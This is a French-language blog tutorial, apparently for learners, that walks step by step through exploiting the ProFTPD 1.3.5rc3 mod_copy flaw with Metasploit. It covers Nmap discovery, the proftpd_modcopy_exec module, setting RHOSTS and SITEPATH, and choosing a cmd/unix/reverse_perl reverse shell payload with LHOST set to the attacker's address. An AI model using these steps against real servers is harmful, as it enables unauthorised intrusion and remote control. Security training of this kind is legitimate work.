Tutoriel Metasploit – Hacking ProFTPD (Mod_Copy)

Tutoriel Metasploit – Hacking ProFTPD (Mod_Copy)

Aujourd’hui nous allons voir comment exploiter une vulnérabilité (Remote command Execution) via le framework metasploit qui se trouve dans le logiciel ProFTPD .

Description de la vulnérabilité:

Cette faille de sécurité permet à un utilisateur non authentifié, (pas besoin de rentrer un utilisateur et un password) de copier des fichiers d’un endroit à un autre sur le serveur, via les commandes SITE CPFR (copy from) et SITE CPTO (copy to).

Voilà le lien de l’exploit sur le site ExploitDB et du module Metasploit .

Analyse & Enumeration :

Pour commencer je lance une analyse de mon réseau puis je découvre l’Ip d’un serveur. Donc je décide de lancer un scan de port avec Nmap.

L’analyse nous indique que nous avons un port 21 qui pour service ProFTPD 1.3.5rc3 🙂 .

Recherche dans le framework metasploit:

Ici nous allons choisir l’exploitation numéros 5 qui encadrer en rouge, pour choisir le module tapez la commande suivante: “use exploit/unix/ftp/proftpd_modcopy_exec”.

Utilisation du module & Configuration:

Puis “show options” pour voir les options du module 🙂 voir l’image ci-dessous.

Nous configurons maintenant les options “RHOSTS & SITEPATH” :).

Tapez ensuite “show paylaods” pour afficher les payloads disponibles, puis nous allons choisir un Reverse Shell, ici ça sera le numéro 5 voici la commande : “set payload cmd/unix/reverse_perl “

Enssuite “show options” pour configurer le Reverse Shell.

Dans le “LHOST” vous mettez votre adresse Ip 😉

Pour lancer l’exploitation vous tapez “exploit” ou “Run”.

Voilà 🙂 une session vient d’être créer, nous sommes dans le serveur.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *